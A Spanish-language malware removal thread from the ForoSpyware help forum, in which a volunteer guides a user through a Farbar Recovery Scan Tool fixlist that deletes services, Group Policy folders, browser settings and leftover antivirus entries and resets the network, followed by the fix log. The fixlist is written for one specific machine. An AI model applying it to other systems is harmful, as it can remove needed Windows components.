Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-05-08 16:31:22.639
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-05-08 16:31:16.556
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-05-08 15:21:12.028
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-05-08 15:21:03.080
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2020-05-08 15:20:59.303
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Información de la memoria =========================== 

BIOS: LENOVO 1LCN50WW 04/17/2017
Placa base: LENOVO Toronto 5B1
Procesador: AMD A10-9600P RADEON R5, 10 COMPUTE CORES 4C+6G
Porcentaje de memoria en uso: 45%
RAM física total: 11663.98 MB
RAM física disponible: 6315.63 MB
Virtual total: 12663.98 MB
Virtual disponible: 5562.49 MB

==================== Unidades ================================

Drive c: (Windows) (Fixed) (Total:891.44 GB) (Free:49.81 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:0.23 GB) NTFS

\\?\Volume{d06ebd12-ebaf-48a5-8e80-5af8855d5382}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.47 GB) NTFS
\\?\Volume{70a091c5-d1eb-4500-8388-4685e3996be8}\ (LENOVO_PART) (Fixed) (Total:12.85 GB) (Free:0.97 GB) NTFS
\\?\Volume{9d9f7dd5-d08a-4a72-811a-a5ca8c7842cd}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 7DCBCEE6)

Partition: GPT.

==================== Final de Addition.txt =======================

Me pregunto si segun los ataques recibidos se sabe si seria conveniente tomar medidas respecto a mis cuentas bancarias online.

Gracias.

Hola

Cambia las contraseñas si no lo has hecho ya.

En cuanto revise los reportes volveré con una respuesta.

Un saludo

Hola.

Gracias Daniela muy amable por atencion.

Muchas gracias.

Hola

Ya puedes perdonar el retraso, se me olvidó tu tema

No descargaste y ejecutaste FRST desde el escritorio como te indiqué, muevelo allí si no fallará el paso siguiente.

MUY Importante Realiza una copia de seguridad del registro :

• Para hacerlo descarga DelFix.exe( en tu escritorio).

• Doble clic para ejecutarlo.(Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona -Ejecutar como Administrador-).

• Atención, ahora marca/selecciona únicamente la casilla "Create registry backup", las demás NO.

• Pulsar en Run.

Se abrirá el informe (DelFix.txt), guárdalo por si fuera necesario y cierra la herramienta.

A continuación con los demás programas cerrados ve a Inicio Ejecutar y escribe Notepad.exe.

• Ahora debes copiar y pegar los códigos/líneas que están en el interior del recuadro de más abajo, dentro del Notepad.

START
CREATERESTOREPOINT:
CLOSEPROCESSES:
GroupPolicy: Restricción ? <==== ATENCIÓN
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-ff2033b4
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo15.msn.com/?pc=LCTE
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKLM -> DefaultScope {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM -> {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM-x32 -> {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKU\S-1-5-21-290510076-2018776080-814419295-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-290510076-2018776080-814419295-1001 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
FF NewTab: Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 -> hxxp://www.bing.com/?pc=COSP&ptag=D032219-N0600AD26CBEB7DD&form=CONMHP&conlogo=CT3335811
FF Extension: (Avast SafePrice | Comparaciones, ofertas y cupones) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-05-04]
FF Extension: (Avast Online Security) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-05-04]
U3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
U3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\win10_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\win10_amd64\AscRegistryFilter.sys [X]
U3 aswbdisk; no ImagePath
U3 avgbdisk; no ImagePath
S3 cpuz145; \??\C:\WINDOWS\temp\cpuz145\cpuz145_x64.sys [X]
2020-05-04 19:31 - 2020-05-04 19:31 - 000000000 ____D C:\Users\Javi\AppData\Local\Avg
2020-05-04 19:17 - 2020-05-07 16:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-05-04 18:48 - 2020-05-05 17:22 - 000000000 ____D C:\ProgramData\AVG
2020-05-04 14:29 - 2020-05-07 16:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software
2020-05-03 17:08 - 2020-05-09 13:08 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\IObit
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\ProgramData\{2F8AE550-5F50-4773-BF82-805D99AD42B5}
2020-05-03 17:00 - 2020-05-09 13:08 - 000000000 ____D C:\Users\Javi\AppData\Roaming\IObit
2020-05-03 17:00 - 2020-05-09 13:08 - 000000000 ____D C:\ProgramData\IObit
2020-05-03 17:00 - 2020-05-03 17:00 - 000000000 ____D C:\Program Files (x86)\IObit
2020-05-03 15:18 - 2020-05-05 17:21 - 000000000 ____D C:\ProgramData\AVAST Software
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
AlternateDataStreams: C:\ProgramData\Temp:2CB9631F [134]
AlternateDataStreams: C:\ProgramData\Temp:EF0F3F33 [131]



HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Guárdalo bajo el nombre de FIXLIST.TXT en el escritorio Esto es muy importante.

Nota Es importante que la herramienta FRST.exe (Farbar Recovery Scanner Tool) y FIXLIST.TXT se encuentren en la misma ubicación (escritorio) o si no, no trabajara.

Y ahora usa el 2º MÉTODO: de esta Faq de Windows 8(aplicable a Windows 10) ¿Cómo iniciar Windows 8/8.1 en Modo Seguro?, para trabajar desde ese modo de windows.

• Ejecuta FRST.exe.(Si usas Windows Vista/7/8 o 10, presiona clic derecho y seleccionas -Ejecutar como Administrador-).
• Presionar el botón FIX/Corregir y aguardar a que termine.
• La Herramienta guardara el reporte de reparación en el escritorio (FIXLOG.TXT).

Pega el contenido de este fichero en tu próxima respuesta.

Reiniciar el equipo y comprobar su funcionamiento en relación al problema planteado y comentarlo.

Un saludo

Hola Daniela.

Por el pequeño olvido no te preocupes, despues de la ayuda prestada solo puedo estar agradecido. El equipo parece comportarse normal. A continuacion pego el fixlog.

Resultados de la corrección de Farbar Recovery Scan Tool (x64) Versión: 10-05-2020 01
Ejecutado por Javi (13-05-2020 11:42:06) Run:1
Ejecutado desde C:\Users\Javi\Desktop
Perfiles cargados: Javi
Modo de Inicio: Safe Mode (with Networking)
==============================================

fixlist contenido:
*****************
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
GroupPolicy: Restricción ? <==== ATENCIÓN
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-ff2033b4
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo15.msn.com/?pc=LCTE
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKLM -> DefaultScope {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM -> {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKLM-x32 -> {83C4EB3D-2B9F-4625-BFCF-88203595B2A6} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
SearchScopes: HKU\S-1-5-21-290510076-2018776080-814419295-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-290510076-2018776080-814419295-1001 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-ff2033b4&q={searchTerms}
FF NewTab: Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436 -> hxxp://www.bing.com/?pc=COSP&ptag=D032219-N0600AD26CBEB7DD&form=CONMHP&conlogo=CT3335811
FF Extension: (Avast SafePrice | Comparaciones, ofertas y cupones) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-05-04]
FF Extension: (Avast Online Security) - C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] [2020-05-04]
U3 wuauserv; C:\WINDOWS\system32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
U3 wuauserv; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\win10_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare Ultimate\drivers\win10_amd64\AscRegistryFilter.sys [X]
U3 aswbdisk; no ImagePath
U3 avgbdisk; no ImagePath
S3 cpuz145; \??\C:\WINDOWS\temp\cpuz145\cpuz145_x64.sys [X]
2020-05-04 19:31 - 2020-05-04 19:31 - 000000000 ____D C:\Users\Javi\AppData\Local\Avg
2020-05-04 19:17 - 2020-05-07 16:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-05-04 18:48 - 2020-05-05 17:22 - 000000000 ____D C:\ProgramData\AVG
2020-05-04 14:29 - 2020-05-07 16:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software
2020-05-03 17:08 - 2020-05-09 13:08 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\IObit
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2020-05-03 17:07 - 2020-05-03 17:07 - 000000000 ____D C:\ProgramData\{2F8AE550-5F50-4773-BF82-805D99AD42B5}
2020-05-03 17:00 - 2020-05-09 13:08 - 000000000 ____D C:\Users\Javi\AppData\Roaming\IObit
2020-05-03 17:00 - 2020-05-09 13:08 - 000000000 ____D C:\ProgramData\IObit
2020-05-03 17:00 - 2020-05-03 17:00 - 000000000 ____D C:\Program Files (x86)\IObit
2020-05-03 15:18 - 2020-05-05 17:21 - 000000000 ____D C:\ProgramData\AVAST Software
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Ningún archivo
AlternateDataStreams: C:\ProgramData\Temp:2CB9631F [134]
AlternateDataStreams: C:\ProgramData\Temp:EF0F3F33 [131]



HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************

Error: El punto de restauración solamente puede ser creado en modo normal.
Procesos cerrados correctamente.
C:\WINDOWS\system32\GroupPolicy\Machine => movido correctamente
C:\WINDOWS\system32\GroupPolicy\GPT.ini => movido correctamente
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => movido correctamente
HKLM\SOFTWARE\Policies\Mozilla => eliminado correctamente
HKLM\Software\\Microsoft\Internet Explorer\Main\\"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" => valor restaurado correctamente
HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main\\"Default_Page_URL"="http://go.microsoft.com/fwlink/?LinkId=69157" => valor restaurado correctamente
"HKU\S-1-5-21-290510076-2018776080-814419295-1001\Software\Microsoft\Internet Explorer\Main\\Secondary Start Pages" => eliminado correctamente
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => valor restaurado correctamente
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{83C4EB3D-2B9F-4625-BFCF-88203595B2A6} => eliminado correctamente
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => valor restaurado correctamente
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{83C4EB3D-2B9F-4625-BFCF-88203595B2A6} => eliminado correctamente
"HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => eliminado correctamente
HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{26080cad-4adc-49ac-8c63-eda16e595cbd} => eliminado correctamente
"Firefox newtab" => eliminado correctamente
C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] => movido correctamente
C:\Users\Javi\AppData\Roaming\Mozilla\Firefox\Profiles\qwagr2af.default-1539189531436\Extensions\[email protected] => movido correctamente
HKLM\System\CurrentControlSet\Services\wuauserv => eliminado correctamente
wuauserv => servicio eliminado correctamente
wuauserv => servicio no encontrado.
HKLM\System\CurrentControlSet\Services\AscFileFilter => eliminado correctamente
AscFileFilter => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\AscRegistryFilter => eliminado correctamente
AscRegistryFilter => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\aswbdisk => eliminado correctamente
aswbdisk => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\avgbdisk => eliminado correctamente
avgbdisk => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\cpuz145 => eliminado correctamente
cpuz145 => servicio eliminado correctamente
C:\Users\Javi\AppData\Local\Avg => movido correctamente
C:\WINDOWS\system32\Tasks\AVG => movido correctamente
C:\ProgramData\AVG => movido correctamente
C:\WINDOWS\system32\Tasks\Avast Software => movido correctamente
C:\Users\Javi\AppData\LocalLow\IObit => movido correctamente
C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690} => movido correctamente
C:\ProgramData\{2F8AE550-5F50-4773-BF82-805D99AD42B5} => movido correctamente
C:\Users\Javi\AppData\Roaming\IObit => movido correctamente
C:\ProgramData\IObit => movido correctamente
C:\Program Files (x86)\IObit => movido correctamente
C:\ProgramData\AVAST Software => movido correctamente
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => eliminado correctamente
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avg => eliminado correctamente
C:\ProgramData\Temp => ":2CB9631F" ADS eliminado correctamente
C:\ProgramData\Temp => ":EF0F3F33" ADS eliminado correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-290510076-2018776080-814419295-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final 1 RemoveProxy: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final 1 CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows

No se puede realizar ninguna operaci¢n en Ethernet mientras los medios
est‚n desconectados.
No se puede realizar ninguna operaci¢n en Wi-Fi mientras los medios
est‚n desconectados.
No se puede realizar ninguna operaci¢n en Conexi¢n de  rea local* 19 mientras los medios
est‚n desconectados.
No se puede realizar ninguna operaci¢n en Ethernet 2 mientras los medios
est‚n desconectados.

========= Final 1 CMD: =========


========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

========= Final 1 CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Unable to connect to BITS - 0x8007043c
El servicio no puede iniciarse en modo a prueba de errores



========= Final 1 CMD: =========


========= netsh advfirewall reset =========

Aceptar


========= Final 1 CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Aceptar


========= Final 1 CMD: =========


========= netsh int ipv4 reset =========

Reenv¡o de compartimiento se restableci¢ correctamente.
Compartimiento se restableci¢ correctamente.
Protocolo de control se restableci¢ correctamente.
Solicitud de secuencia eco se restableci¢ correctamente.
Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Direcci¢n de difusi¢n por proximidad (a se restableci¢ correctamente.
Direcciones de multidifusi¢n se restableci¢ correctamente.
Direcci¢n de unidifusi¢n se restableci¢ correctamente.
Vecino se restableci¢ correctamente.
Ruta de acceso se restableci¢ correctamente.
Posible se restableci¢ correctamente.
Directiva de prefijo se restableci¢ correctamente.
Vecino de proxy se restableci¢ correctamente.
Ruta se restableci¢ correctamente.
Prefijo de sitio se restableci¢ correctamente.
Subinterfaz se restableci¢ correctamente.
Patr¢n de reactivaci¢n se restableci¢ correctamente.
Resolver vecino se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Error al restablecer .
Acceso denegado.

 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final 1 CMD: =========


========= netsh int ipv6 reset =========

Reenv¡o de compartimiento se restableci¢ correctamente.
Compartimiento se restableci¢ correctamente.
Protocolo de control se restableci¢ correctamente.
Solicitud de secuencia eco se restableci¢ correctamente.
Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Direcci¢n de difusi¢n por proximidad (a se restableci¢ correctamente.
Direcciones de multidifusi¢n se restableci¢ correctamente.
Direcci¢n de unidifusi¢n se restableci¢ correctamente.
Vecino se restableci¢ correctamente.
Ruta de acceso se restableci¢ correctamente.
Posible se restableci¢ correctamente.
Directiva de prefijo se restableci¢ correctamente.
Vecino de proxy se restableci¢ correctamente.
Ruta se restableci¢ correctamente.
Prefijo de sitio se restableci¢ correctamente.
Subinterfaz se restableci¢ correctamente.
Patr¢n de reactivaci¢n se restableci¢ correctamente.
Resolver vecino se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Error al restablecer .
Acceso denegado.

 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final 1 CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 9461760 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 40686195 B
Java, Flash, Steam htmlcache => 12650738 B
Windows/system/drivers => 4562319 B
Edge => 26741 B
Chrome => 0 B
Firefox => 925357427 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 6656 B
ProgramData => 6656 B
Public => 6656 B
systemprofile => 6656 B
systemprofile32 => 6656 B
LocalService => 14554 B
NetworkService => 5918582 B
Javi => 143017196 B

RecycleBin => 114616419 B
EmptyTemp: => 1.2 GB datos temporales eliminados.

================================


El sistema necesita reiniciarse.

==== Final 1 Fixlog 11:51:14 ====

Hola

Sigue estos pasos, para eliminar las herramientas utilizadas:

Para hacerlo utiliza de nuevo/descarga >> DelFix.exe en tu escritorio.

• Doble clic para ejecutarlo. (Si usas Windows Vista/7/8 o 10 presiona clic derecho y selecciona - Ejecutar como Administrador)

• Marca todas las casillas, y pulsas en Run

Se abrirá el informe (DelFix.txt), puedes cerrarlo.

Comenta si ya está todo bien.

Un saludo

Hola Daniela.

Paso realizado. El ordenador tiene pinta de ir bien, asi pues te agradezco de nuevo a ti y al equipo de la web el trabajo que desarrollais cada dia. Un aplauso enorme y, por favor, no nos avandoneis que os necesitamos.

Muchas gracias.

Hola @fran50

Esperamos seguir por muchos años más

Gracias a ti por confiar en ForoSpyware. Ha sido un placer ayudarte

Nos alegramos que se te haya resuelto Damos el tema por solucionado.

Un saludo